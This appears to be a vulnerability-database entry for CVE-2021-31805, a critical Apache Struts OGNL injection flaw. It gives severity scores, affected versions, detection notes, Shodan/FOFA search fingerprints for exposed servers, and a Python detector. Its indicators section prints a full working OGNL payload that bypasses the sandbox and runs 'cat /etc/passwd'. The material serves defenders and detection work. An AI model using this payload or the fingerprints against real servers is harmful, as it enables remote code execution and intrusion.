cbcvebase.
CVE-2021-31805
published 2022-04-12

Priority: P1 91 · critical 9.8 (CVSS 3.1)
CVSS vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Flags: ITW · EXPLOIT · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 85.31% (99.7th percentile)
The fix issued for CVE-2020-17530 was incomplete. So from Apache Struts 2.0.0 to 2.5.29, still some of the tag’s attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation.

Affected

1 range
Vendor   Product   Version range    Fixed in
apache   struts    2.0.0 – 2.5.29

Detection & IOCs (extracted from sources)

Command: %{ (#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) + (#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) + (#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) + (#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) + (#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) + (#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) + (#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) + (#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) + (#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'cat /etc/passwd'})) }
  • Exploit is delivered via HTTP POST with multipart/form-data body; the OGNL payload is injected into a form field (e.g., 'id') using the %{...} forced-evaluation syntax. Monitor for multipart POST requests containing OGNL expressions with BeanMap, memberAccess, excludedPackageNames, excludedClasses, or InstanceManager references.
  • The payload abuses 'freemarker.template.utility.Execute' instantiated via 'org.apache.tomcat.InstanceManager' to achieve RCE. Alert on any OGNL expression referencing these class names in HTTP request bodies.
  • Shodan/FOFA fingerprints for exposed Struts2 instances: search for HTTP HTML containing 'apache struts', page title 'struts2 showcase', or HTML containing 'struts problem report'.
  • The exploit bypasses the OGNL sandbox by emptying 'excludedPackageNames' and 'excludedClasses' through a BeanMap reflection chain — a pattern shared with S2-061 (CVE-2020-17530). Detections written for S2-061 payloads should be extended to cover this variant.
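A defender-side check for the indicators listed above, as an added example that is not part of this record or of Apache Struts: it parses a multipart POST body, extracts the forced-evaluation blocks with nested braces handled (the payload contains #@...BeanMap@{} inside the outer %{...}) and reports which indicator tokens each form field carries. The minimal multipart parser, the constructed sample request and the field names are assumptions made for the example.

```python
import re

# Indicator tokens from the detection notes above; several together inside %{...} is a strong signal.
OGNL_INDICATORS = ("BeanMap", "memberAccess", "excludedPackageNames", "excludedClasses",
                   "InstanceManager", "freemarker.template.utility.Execute")

# Constructed request (not a working exploit): one benign field plus a field whose
# value is a forced-evaluation block referencing several indicator tokens.
BOUNDARY = "----ConstructedBoundary42"
SAMPLE_CT = "multipart/form-data; boundary=" + BOUNDARY
SAMPLE_BODY = (
    f"--{BOUNDARY}\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\nalice\r\n"
    f"--{BOUNDARY}\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n"
    "%{ (#m=#@org.apache.commons.collections.BeanMap@{}) + #m.memberAccess"
    f" + #m.excludedClasses + #app.InstanceManager }}\r\n--{BOUNDARY}--\r\n"
)

def parse_multipart(body: str, content_type: str) -> dict:
    # Minimal multipart/form-data parser -> {field_name: value}; assumes simple
    # text parts with CRLF line endings and no nested multipart.
    m = re.search(r'boundary="?([^";]+)"?', content_type)
    fields = {}
    for part in (body.split("--" + m.group(1)) if m else []):
        headers, _, value = part.strip("\r\n").partition("\r\n\r\n")
        name = re.search(r'name="([^"]*)"', headers)
        if name:
            fields[name.group(1)] = value
    return fields

def forced_eval_blocks(value: str) -> list:
    # Bodies of %{...} blocks with nested braces honoured: a non-greedy regex
    # would stop at the '}' of '#@...BeanMap@{}' and miss everything after it.
    blocks, i = [], 0
    while (start := value.find("%{", i)) != -1:
        depth, j = 0, start + 1
        while j < len(value) and (depth := depth + (value[j] == "{") - (value[j] == "}")):
            j += 1
        blocks.append(value[start + 2:j])
        i = j + 1
    return blocks

def inspect_request(content_type: str, body: str) -> dict:
    # Map each form field to the indicator tokens inside its %{...} blocks;
    # a field that contains no forced-evaluation block is never flagged.
    findings = {}
    for name, val in parse_multipart(body, content_type).items():
        expr = " ".join(forced_eval_blocks(val))
        hits = [t for t in OGNL_INDICATORS if t in expr]
        if hits:
            findings[name] = hits
    return findings
```

Feeding real request bodies through inspect_request gives a per-field list of matched tokens; a hit on BeanMap together with memberAccess or the excluded* lists is the S2-061-style sandbox-unlock sequence the notes above describe.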

CVSS provenance

Source         Version  Score  Severity  Vector
nvd            v3.1     9.8    CRITICAL  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd            v2.0     7.5    HIGH      AV:N/AC:L/Au:N/C:P/I:P/A:P
ghsa                    9.8    CRITICAL
osv                     9.8    CRITICAL
vulncheck               9.8    CRITICAL
vendor_oracle           9.8    CRITICAL
vendor_redhat           9.8    CRITICAL